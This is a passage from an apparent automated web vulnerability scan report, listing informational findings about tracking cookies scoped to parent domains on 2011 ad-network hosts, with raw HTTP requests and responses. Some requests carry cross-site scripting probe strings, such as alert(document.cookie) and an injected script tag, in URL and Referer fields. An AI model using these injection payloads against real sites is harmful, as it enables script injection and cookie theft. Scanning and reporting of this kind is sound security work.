Cookie: 01AI=2-2-994BC3474460ED597F3BB1057E7FB23E522CA32BEEFF3E1E369DC62CF603B712-3671A517BAF4306156A69134FA6BB489C2599F16986173AB9F8F7DCC520B74B1

Response

HTTP/1.1 302 Moved Temporarily
Content-Length: 0
Location: http://tag.admeld.com/ad/js/195/fsv/728x90/ros?01AD=3yVODHT1FTn_jiDHXcACemHep5oszD1WyQmFndM5d8N-pvL0NrzCpeg&01RI=D54777EA22B9F46&01NA=&url=
Expires: Mon, 13 Jun 2011 11:01:31 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 13 Jun 2011 11:01:31 GMT
Connection: close
Set-Cookie: 01AI=2-2-C962F508BE5AF06FD18AC05E8D5BBA6BCEF86873CF07F773BC88A059DC559C10-2AFA78C53CBD1FAEA308969CDD72466CA774E2FA1ADE86BF658712314425319E; expires=Tue, 12-Jun-2012 11:01:31 GMT; path=/; domain=.abmr.net
P3P: policyref="http://www.abmr.net/w3c/policy.xml", CP="NON DSP COR CURa ADMa DEVa OUR SAMa IND"

12.41. http://ak1.abmr.net/is/www.burstnet.com previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ak1.abmr.net
Path:	/is/www.burstnet.com

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

01AI=2-2-50C2793544FFA367044F9A6B21804409E0D0C42CDB25AA399A75BA32C42D4A42-5A998D7C2BD1F1ABB965917E90382B2E8C022E108555454D21859560421ED2FB; expires=Tue, 12-Jun-2012 11:21:27 GMT; path=/; domain=.abmr.net

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /is/www.burstnet.com?U=/enlightn/8171/99D2/&V=3-8PZDPW2B8FVYEznyXDprq3t5cheR09eLshcw9vrm1EMWg8l61kvNNg%3d%3d&I=AA69064E758371F&D=burstnet.com&01AD=1& HTTP/1.1
Host: ak1.abmr.net
Proxy-Connection: keep-alive
Referer: http://sportdfw.com/z-the-fort-worth-four/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 01AI=2-2-94D75D1471844A54570A2231EC99060257B8EE6F4BC8D76DA0AD302C60AC5812-1C57698E8D09B0F3DEB2B87D790F125D6A057CB721B751EB7948EC37F126429D

Response

HTTP/1.1 302 Moved Temporarily
Content-Length: 0
Location: http://www.burstnet.com/enlightn/8171/99D2/?01AD=3La1wK7iY20a2x1N-TAOEYaRfKb4qxWQ5vuqrULpogqrnrKuvSZ2lQQ&01RI=AA69064E758371F&01NA=
Expires: Mon, 13 Jun 2011 11:21:27 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 13 Jun 2011 11:21:27 GMT
Connection: close
Set-Cookie: 01AI=2-2-50C2793544FFA367044F9A6B21804409E0D0C42CDB25AA399A75BA32C42D4A42-5A998D7C2BD1F1ABB965917E90382B2E8C022E108555454D21859560421ED2FB; expires=Tue, 12-Jun-2012 11:21:27 GMT; path=/; domain=.abmr.net
P3P: policyref="http://www.abmr.net/w3c/policy.xml", CP="NON DSP COR CURa ADMa DEVa OUR SAMa IND"

12.42. http://altfarm.mediaplex.com/ad/js/12309-129868-23636-1 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://altfarm.mediaplex.com
Path:	/ad/js/12309-129868-23636-1

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

mojo3=12309:23636/12760:2414/17038:20406/9966:1105/17550:1884/15017:13113/14302:40017/1551:9866/9700:21584/10759:1104/12124:36735/14855:1178/10433:17922/13198:5934/9608:1178/14207:2056/13754:29158; expires=Thu, 13-Jun-2013 5:17:30 GMT; path=/; domain=.mediaplex.com;

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ad/js/12309-129868-23636-1?mpt=6245544&mpvc=http://ad.doubleclick.net/click%3Bh%3Dv8/3b25/17/1e8/%2a/n%3B241904200%3B0-0%3B4%3B40342997%3B3454-728/90%3B42422626/42440413/1%3Bu%3Drmxli_3163700|surl_http%3A//thesouthern.com/sports/basketball/article_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38.html%3B%7Esscs%3D%3fhttp://ad.yieldmanager.com/clk?2,13%3Becb025846c58424b%3B13088ae1ef6,0%3B%3B%3B4270644083,mTsCACJqCwC3E5MAAAAAADPOJAAAAAAAAgAAAAYAAAAAAP8AAAACB4FnFAAAAAAAuowIAAAAAAA0RjAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADx4gUAAAAAAAIAAwAAAAAA9R6uiDABAAAAAAAAADI0NjFiNzE2LTk1YWQtMTFlMC1hMjVlLWUzNmM1YTM3NjJiYQAAAAAAAAA=,,http%3A%2F%2Fthesouthern.com%2Fsports%2Fbasketball%2Farticle_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38.html%3Fc03b0%22-alert%28document.cookie%29-%225958ea17fd2%3D1, HTTP/1.1
Host: altfarm.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?mTsCACJqCwC3E5MAAAAAADPOJAAAAAAAAgAAAAYAAAAAAP8AAAACB4FnFAAAAAAAuowIAAAAAAA0RjAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADx4gUAAAAAAAIAAwAAAAAAUrgeheuRCECamZmZmZkKQM8tcer33BlAAAAAAAAAHEDQLXHq99wZQAAAAAAAABxAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACOmofmodM-CgUplvRSzdlkmEMRVc6kOd6J3c5dAAAAAA==,,http%3A%2F%2Fthesouthern.com%2Fsports%2Fbasketball%2Farticle_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38.html%3Fc03b0%22-alert%28document.cookie%29-%225958ea17fd2%3D1,Z%3D728x90%26_salt%3D1188639314%26anmember%3D514%26anprice%3D220%26r%3D1%26s%3D748066,2461b716-95ad-11e0-a25e-e36c5a3762ba
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=173274949960; mojo1=s/137381247401/80; mojo2=14302:16279/13198:5934; mojo3=17038:20406/9966:1105/17550:1884/15017:13113/12309:3981/14302:40017/1551:9866/9700:21584/10759:1104/12124:36735/14855:1178/10433:17922/13198:5934/9608:1178/14207:2056/13754:29158

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
Cache-Control: no-store
Pragma: no-cache
Expires: 0
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR PSAo PSDo OUR IND UNI COM NAV"
Set-Cookie: mojo3=12309:23636/12760:2414/17038:20406/9966:1105/17550:1884/15017:13113/14302:40017/1551:9866/9700:21584/10759:1104/12124:36735/14855:1178/10433:17922/13198:5934/9608:1178/14207:2056/13754:29158; expires=Thu, 13-Jun-2013 5:17:30 GMT; path=/; domain=.mediaplex.com;
Location: http://img.mediaplex.com/content/0/12309/129868/1361274_us_smb_q1w12_728x90_mcsft_firstserver_dtp1a.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F12309-129868-23636-1%3Fmpt%3D6245544&mpjs=rt.legolas-media.com%2Flgrt%3Fci%3D2%26ti%3D361&mpt=6245544&mpvc=http://ad.doubleclick.net/click%3Bh%3Dv8/3b25/17/1e8/%2a/n%3B241904200%3B0-0%3B4%3B40342997%3B3454-728/90%3B42422626/42440413/1%3Bu%3Drmxli_3163700|surl_http%3A//thesouthern.com/sports/basketball/article_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38.html%3B%7Esscs%3D%3fhttp://ad.yieldmanager.com/clk?2,13%3Becb025846c58424b%3B13088ae1ef6,0%3B%3B%3B4270644083,mTsCACJqCwC3E5MAAAAAADPOJAAAAAAAAgAAAAYAAAAAAP8AAAACB4FnFAAAAAAAuowIAAAAAAA0RjAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADx4gUAAAAAAAIAAwAAAAAA9R6uiDABAAAAAAAAADI0NjFiNzE2LTk1YWQtMTFlMC1hMjVlLWUzNmM1YTM3NjJiYQAAAAAAAAA=,,http%3A%2F%2Fthesouthern.com%2Fsports%2Fbasketball%2Farticle_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38.html%3Fc03b0%22-alert%28document.cookie%29-%225958ea17fd2%3D1,
Content-Length: 0
Date: Mon, 13 Jun 2011 11:19:55 GMT

12.43. http://altfarm.mediaplex.com/ad/js/17038-128465-20406-11 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://altfarm.mediaplex.com
Path:	/ad/js/17038-128465-20406-11

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

mojo3=17038:20406/12309:23636/9966:1105/17550:1884/15017:13113/14302:40017/1551:9866/9700:21584/10759:1104/12124:36735/14855:1178/10433:17922/13198:5934/9608:1178/14207:2056/13754:29158; expires=Thu, 13-Jun-2013 5:24:04 GMT; path=/; domain=.mediaplex.com;

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ad/js/17038-128465-20406-11?mpt=4df5f0d4b6b72&mpvc=http://www30a2.glam.com/gad/click.act?0339-_gclickid=gaclk4df5f0d4b7ef9-_advid=50002325-_adid=5000042624-_crid=500030953-_aipid=201106130402-_ge_=1^2^7d90fa6f3101c8fade5f2bf750f33a43-ord=4654773336369544-afid=1000212071-dsid=864279-sz=728x90-zone=/-sid=115232130551023312111-tile=2-seq=1-tt=j-atf=0-url=00l3it-flg=64-u=b0032g2reou1ssci1k9,f0f02sa,g10001s-_gclick_gaclk4df5f0d4b7ef9 HTTP/1.1
Host: altfarm.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://sportdfw.com/aboutcontact-us/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=173274949960; mojo1=s/137381247401/80; mojo2=14302:16279/13198:5934; mojo3=12309:23636/17038:20406/9966:1105/17550:1884/15017:13113/14302:40017/1551:9866/9700:21584/10759:1104/12124:36735/14855:1178/10433:17922/13198:5934/9608:1178/14207:2056/13754:29158

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
Cache-Control: no-store
Pragma: no-cache
Expires: 0
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR PSAo PSDo OUR IND UNI COM NAV"
Set-Cookie: mojo3=17038:20406/12309:23636/9966:1105/17550:1884/15017:13113/14302:40017/1551:9866/9700:21584/10759:1104/12124:36735/14855:1178/10433:17922/13198:5934/9608:1178/14207:2056/13754:29158; expires=Thu, 13-Jun-2013 5:24:04 GMT; path=/; domain=.mediaplex.com;
Location: http://img.mediaplex.com/content/0/17038/128465/Roxy_728x90_Female_Butt.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F17038-128465-20406-11%3Fmpt%3D4df5f0d4b6b72&mpt=4df5f0d4b6b72&mpvc=http://www30a2.glam.com/gad/click.act?0339-_gclickid=gaclk4df5f0d4b7ef9-_advid=50002325-_adid=5000042624-_crid=500030953-_aipid=201106130402-_ge_=1^2^7d90fa6f3101c8fade5f2bf750f33a43-ord=4654773336369544-afid=1000212071-dsid=864279-sz=728x90-zone=/-sid=115232130551023312111-tile=2-seq=1-tt=j-atf=0-url=00l3it-flg=64-u=b0032g2reou1ssci1k9,f0f02sa,g10001s-_gclick_gaclk4df5f0d4b7ef9
Content-Length: 0
Date: Mon, 13 Jun 2011 11:13:28 GMT

12.44. http://amch.questionmarket.com/adsc/d724925/2/725047/adscout.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://amch.questionmarket.com
Path:	/adsc/d724925/2/725047/adscout.php

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

CS1=deleted; expires=Sun, 13-Jun-2010 11:10:48 GMT; path=/; domain=.questionmarket.com
CS1=40348193-10-1_898849-1-2_41511170-8-1_600001476369-3-6_600001470345-3-2_42093232-5-6_42093309-5-9_600001476380-3-2_600001476381-3-1_600001476393-3-2_600001470352-3-1_600001470355-3-1_600001470354-3-2_600001470351-3-2_600001476392-3-1_908687-7-1_600001476369-7-3_38410992-16-1_600001470355-7-1_600001470346-7-1_40506188-17-1_42061907-3-1_42061906-3-2_42061908-3-4_914175-2-1_41958468-7-1_911895-5-1_911895-6-1_911895-2-1_911895-4-1_911895-3-1_725047-2-2; expires=Fri, 03-Aug-2012 03:10:49 GMT; path=/; domain=.questionmarket.com
ES=845473-OaS)M-0_899015-nQ5*M-0_908396-`YF*M-ix6_898849-j.h)M-^s$_865756-gf3.M-0_907755-rWF*M-CH>_855789-fKz.M-0_910475-*S>.M-U"2_913745-C8[.M-0_910169-P$[.M-0_910595-5[T/M-U4_724925-tLN:M-06; expires=Fri, 03-Aug-2012 03:10:49 GMT; path=/; domain=.questionmarket.com;

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

HTTP/1.1 200 OK
Date: Mon, 13 Jun 2011 11:10:49 GMT
Server: Apache/2.2.14 (Ubuntu)
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Pragma: no-cache
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC"
DL_S: a221
Set-Cookie: CS1=deleted; expires=Sun, 13-Jun-2010 11:10:48 GMT; path=/; domain=.questionmarket.com
Set-Cookie: CS1=40348193-10-1_898849-1-2_41511170-8-1_600001476369-3-6_600001470345-3-2_42093232-5-6_42093309-5-9_600001476380-3-2_600001476381-3-1_600001476393-3-2_600001470352-3-1_600001470355-3-1_600001470354-3-2_600001470351-3-2_600001476392-3-1_908687-7-1_600001476369-7-3_38410992-16-1_600001470355-7-1_600001470346-7-1_40506188-17-1_42061907-3-1_42061906-3-2_42061908-3-4_914175-2-1_41958468-7-1_911895-5-1_911895-6-1_911895-2-1_911895-4-1_911895-3-1_725047-2-2; expires=Fri, 03-Aug-2012 03:10:49 GMT; path=/; domain=.questionmarket.com
Set-Cookie: ES=845473-OaS)M-0_899015-nQ5*M-0_908396-`YF*M-ix6_898849-j.h)M-^s$_865756-gf3.M-0_907755-rWF*M-CH>_855789-fKz.M-0_910475-*S>.M-U"2_913745-C8[.M-0_910169-P$[.M-0_910595-5[T/M-U4_724925-tLN:M-06; expires=Fri, 03-Aug-2012 03:10:49 GMT; path=/; domain=.questionmarket.com;
Cache-Control: post-check=0, pre-check=0
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,...........D..;

12.45. http://amch.questionmarket.com/adsc/d888315/39/500005401531/decide.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://amch.questionmarket.com
Path:	/adsc/d888315/39/500005401531/decide.php

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

CS1=deleted; expires=Sun, 13 Jun 2010 11:22:51 GMT; path=/; domain=.questionmarket.com
CS1=40348193-10-1_898849-1-2_41511170-8-1_600001476369-3-6_600001470345-3-2_42093232-5-6_42093309-5-9_600001476380-3-2_600001476381-3-1_600001476393-3-2_600001470352-3-1_600001470355-3-1_600001470354-3-2_600001470351-3-2_600001476392-3-1_908687-7-1_600001476369-7-3_38410992-16-1_600001470355-7-1_600001470346-7-1_40506188-17-1_42061907-3-1_42061906-3-2_42061908-3-4_914175-2-1_41958468-7-1_911895-5-1_911895-6-1_911895-2-1_911895-4-1_911895-3-1_725047-2-2_500005401531-39-2; expires=Fri, 03 Aug 2012 03:22:52 GMT; path=/; domain=.questionmarket.com
ES=845473-OaS)M-0_899015-nQ5*M-0_908396-`YF*M-ix6_898849-j.h)M-^s$_865756-gf3.M-0_907755-rWF*M-CH>_855789-fKz.M-0_910475-*S>.M-U"2_913745-C8[.M-0_910169-P$[.M-0_910595-5[T/M-U4_724925-tLN:M-08_888315-)WN:M-E3; expires=Fri, 03-Aug-2012 03:22:52 GMT; path=/; domain=.questionmarket.com;

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adsc/d888315/39/500005401531/decide.php?ord=1307963894 HTTP/1.1
Host: amch.questionmarket.com
Proxy-Connection: keep-alive
Referer: http://tunedin.blogs.time.com/2011/06/13/game-of-thrones-watch-its-all-in-the-execution-2/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CS1=40348193-10-1_898849-1-2_41511170-8-1_600001476369-3-6_600001470345-3-2_42093232-5-6_42093309-5-9_600001476380-3-2_600001476381-3-1_600001476393-3-2_600001470352-3-1_600001470355-3-1_600001470354-3-2_600001470351-3-2_600001476392-3-1_908687-7-1_600001476369-7-3_38410992-16-1_600001470355-7-1_600001470346-7-1_40506188-17-1_42061907-3-1_42061906-3-2_42061908-3-4_914175-2-1_41958468-7-1_911895-5-1_911895-6-1_911895-2-1_911895-4-1_911895-3-1_725047-2-2; ES=845473-OaS)M-0_899015-nQ5*M-0_908396-`YF*M-ix6_898849-j.h)M-^s$_865756-gf3.M-0_907755-rWF*M-CH>_855789-fKz.M-0_910475-*S>.M-U"2_913745-C8[.M-0_910169-P$[.M-0_910595-5[T/M-U4_724925-tLN:M-08

Response

HTTP/1.1 200 OK
Date: Mon, 13 Jun 2011 11:22:52 GMT
Server: Apache/2.2.3
X-Powered-By: PHP/4.4.4
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Pragma: no-cache
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
DL_S: b202.dl
Set-Cookie: CS1=deleted; expires=Sun, 13 Jun 2010 11:22:51 GMT; path=/; domain=.questionmarket.com
Set-Cookie: CS1=40348193-10-1_898849-1-2_41511170-8-1_600001476369-3-6_600001470345-3-2_42093232-5-6_42093309-5-9_600001476380-3-2_600001476381-3-1_600001476393-3-2_600001470352-3-1_600001470355-3-1_600001470354-3-2_600001470351-3-2_600001476392-3-1_908687-7-1_600001476369-7-3_38410992-16-1_600001470355-7-1_600001470346-7-1_40506188-17-1_42061907-3-1_42061906-3-2_42061908-3-4_914175-2-1_41958468-7-1_911895-5-1_911895-6-1_911895-2-1_911895-4-1_911895-3-1_725047-2-2_500005401531-39-2; expires=Fri, 03 Aug 2012 03:22:52 GMT; path=/; domain=.questionmarket.com
Set-Cookie: ES=845473-OaS)M-0_899015-nQ5*M-0_908396-`YF*M-ix6_898849-j.h)M-^s$_865756-gf3.M-0_907755-rWF*M-CH>_855789-fKz.M-0_910475-*S>.M-U"2_913745-C8[.M-0_910169-P$[.M-0_910595-5[T/M-U4_724925-tLN:M-08_888315-)WN:M-E3; expires=Fri, 03-Aug-2012 03:22:52 GMT; path=/; domain=.questionmarket.com;
Cache-Control: post-check=0, pre-check=0
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,...........D..;

12.46. http://amch.questionmarket.com/adsc/d893515/8/41197792/decide.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://amch.questionmarket.com
Path:	/adsc/d893515/8/41197792/decide.php

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

CS1=deleted; expires=Sun, 13 Jun 2010 11:34:31 GMT; path=/; domain=.questionmarket.com
CS1=40348193-10-1_898849-1-2_41511170-8-1_600001476369-3-6_600001470345-3-2_42093232-5-6_42093309-5-9_600001476380-3-2_600001476381-3-1_600001476393-3-2_600001470352-3-1_600001470355-3-1_600001470354-3-2_600001470351-3-2_600001476392-3-1_908687-7-1_600001476369-7-3_38410992-16-1_600001470355-7-1_600001470346-7-1_40506188-17-1_42061907-3-1_42061906-3-2_42061908-3-4_914175-2-1_41958468-7-1_911895-5-1_911895-6-1_911895-2-1_911895-4-1_911895-3-1_725047-2-2_500005401531-39-1_41197792-8-2; expires=Fri, 03 Aug 2012 03:34:32 GMT; path=/; domain=.questionmarket.com
ES=845473-OaS)M-0_899015-nQ5*M-0_908396-`YF*M-ix6_898849-j.h)M-^s$_865756-gf3.M-0_907755-rWF*M-CH>_855789-fKz.M-0_910475-*S>.M-U"2_913745-C8[.M-0_910169-P$[.M-0_910595-5[T/M-U4_724925-tLN:M-08_888315-)WN:M-0_893515-|hN:M-2; expires=Fri, 03-Aug-2012 03:34:32 GMT; path=/; domain=.questionmarket.com;

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adsc/d893515/8/41197792/decide.php?ord=1307964869 HTTP/1.1
Host: amch.questionmarket.com
Proxy-Connection: keep-alive
Referer: http://hollywoodcrush.mtv.com/favicon.ico4bc7e%3C/script%3E%3Cscript%3Ealert(%22FAVICON%22)%3C/script%3E4e5acb99ae0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CS1=40348193-10-1_898849-1-2_41511170-8-1_600001476369-3-6_600001470345-3-2_42093232-5-6_42093309-5-9_600001476380-3-2_600001476381-3-1_600001476393-3-2_600001470352-3-1_600001470355-3-1_600001470354-3-2_600001470351-3-2_600001476392-3-1_908687-7-1_600001476369-7-3_38410992-16-1_600001470355-7-1_600001470346-7-1_40506188-17-1_42061907-3-1_42061906-3-2_42061908-3-4_914175-2-1_41958468-7-1_911895-5-1_911895-6-1_911895-2-1_911895-4-1_911895-3-1_725047-2-2_500005401531-39-1; ES=845473-OaS)M-0_899015-nQ5*M-0_908396-`YF*M-ix6_898849-j.h)M-^s$_865756-gf3.M-0_907755-rWF*M-CH>_855789-fKz.M-0_910475-*S>.M-U"2_913745-C8[.M-0_910169-P$[.M-0_910595-5[T/M-U4_724925-tLN:M-08_888315-)WN:M-0

Response

HTTP/1.1 200 OK
Date: Mon, 13 Jun 2011 11:34:32 GMT
Server: Apache/2.2.3
X-Powered-By: PHP/4.4.4
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Pragma: no-cache
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
DL_S: b102.dl
Set-Cookie: CS1=deleted; expires=Sun, 13 Jun 2010 11:34:31 GMT; path=/; domain=.questionmarket.com
Set-Cookie: CS1=40348193-10-1_898849-1-2_41511170-8-1_600001476369-3-6_600001470345-3-2_42093232-5-6_42093309-5-9_600001476380-3-2_600001476381-3-1_600001476393-3-2_600001470352-3-1_600001470355-3-1_600001470354-3-2_600001470351-3-2_600001476392-3-1_908687-7-1_600001476369-7-3_38410992-16-1_600001470355-7-1_600001470346-7-1_40506188-17-1_42061907-3-1_42061906-3-2_42061908-3-4_914175-2-1_41958468-7-1_911895-5-1_911895-6-1_911895-2-1_911895-4-1_911895-3-1_725047-2-2_500005401531-39-1_41197792-8-2; expires=Fri, 03 Aug 2012 03:34:32 GMT; path=/; domain=.questionmarket.com
Set-Cookie: ES=845473-OaS)M-0_899015-nQ5*M-0_908396-`YF*M-ix6_898849-j.h)M-^s$_865756-gf3.M-0_907755-rWF*M-CH>_855789-fKz.M-0_910475-*S>.M-U"2_913745-C8[.M-0_910169-P$[.M-0_910595-5[T/M-U4_724925-tLN:M-08_888315-)WN:M-0_893515-|hN:M-2; expires=Fri, 03-Aug-2012 03:34:32 GMT; path=/; domain=.questionmarket.com;
Cache-Control: post-check=0, pre-check=0
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,...........D..;

12.47. http://api.bizographics.com/v1/profile.redirect previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://api.bizographics.com
Path:	/v1/profile.redirect

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

BizoID=3c403c93-d95c-49df-9ac2-80ec4d87e192;Version=0;Domain=.bizographics.com;Path=/;Max-Age=15768000
BizoData=vipSsUXrfhMAyjSpNgk6T39Qb1MaQBj6WisqThbDTBp4B2VrCIGNp5RVO9z4XipLmXyvHipHCqwrNYQnSLfO0fWLyTcgvE2yQ6Ze1pbZ033FKv3YPdeKubByYtiikBBmWL9vy8qeiiV0HIm4nYPdeKubByYsTG1iiA4HFhaObXcis5ip6FU7wE4Cwiib580ipET68lwNWsfNIUXfAULHZeWiinnp8DesekBgQXcy3tgL326ELqfmQZU2ueTC3wAqip042iirMZRzHxvSTtisvHuK6gvBr0Pej7isVgBvV8Kk0mwBbXkU4HujvywisJd2WNMedisMgTj03JcHP8nOcWG7PlEjoggxAnMEZgmfujiiwd7OBYhLnmqoZbsnNXFrLu9efHlOsWD3viiCAgYAghYxv0EPdR9KLjw34ANmJisipoEKzRnoN2kisFipn0SmXcpqPldy6c1wwIOnACxhiiZKjPFbQPWovaWUipNN9QFd9eD4OnACxhiiZKjFbQEPZ8RywpanugMm4hIisHF8ipo0I9mx5t08YADUXDkiigPUiiKWBw7T81HeReHfLTisiiisV8xMd5is5La2EsecOiiswIOnACxhiiZKjZaTdMSAamf236fFiiolkC0OCwcaIYpAt5LXM0XIwCmlb9oLhkw16YkipCwcaIYpAt5WoPvGg4qipctjJkmu5ePipiiMaODe9cOOkiihdML7elZkd0OC52PD2YWGqMTlyYtq6ZaRfZf5eQkf2ovdhChExDfe35GyRzNlvLnotcIy4PNP83xecbst1iib7gFsDSqDpxImEGrfTPfpgZUI4cd9sW5wsAHescjFAyxuEGrfTPfpgZXwYXPBFhecOvsiim5vOPNb106OGBImB2putC69uElEwF27JCOiioj1KhgUUhrqOIuN5aBiiOnqpc8IV71Rjsv7Qu4issSdo1Daipe0Wm24107qgSVExkNK7HUtFp4B4dlWpgdhN4mIk5QrdBD8l3ZY0x538DagN4siiD1aaCmzSiiJQK8lykQMu396nckTo4nxwoHo0CoRZSiif2tsuiicEnxS3cJipCVZ8TsalisgS9TXOCwHZXFvbNlR3nLMBjvpyipewHlOhwIG1G4rZ9utJNJRFsRyXovJWz7fUPpX3ydWr1XIQIIGVXmipwPmwHj2LBiitkUr3XlAiscQyzlKxEyj6p6QYsvgf51m9Da6XiirwxBVxp0nP77W3oMweEdXU6bnuSFykW54FN6yii1oRyCQGqk84Nzl6iivmHYAZUugJ8wSyDpwAsYYmSo3LDnHii2Cip8QnOcWG7PlEjokDX1b7LIGtQieie;Version=0;Domain=.bizographics.com;Path=/;Max-Age=15768000

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /v1/profile.redirect?callback_url=http%3A%2F%2Fpix04.revsci.net%2FD10889%2Fa1%2F0%2F3%2F0.gif%3FD%3DDM_LOC%3Dhttp%3A%2F%2Fbizo.com%3F&api_key=bbe168f7d7bf46369bbe29684c749a27 HTTP/1.1
Host: api.bizographics.com
Proxy-Connection: keep-alive
Referer: http://tunedin.blogs.time.com/2011/06/13/game-of-thrones-watch-its-all-in-the-execution-2/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
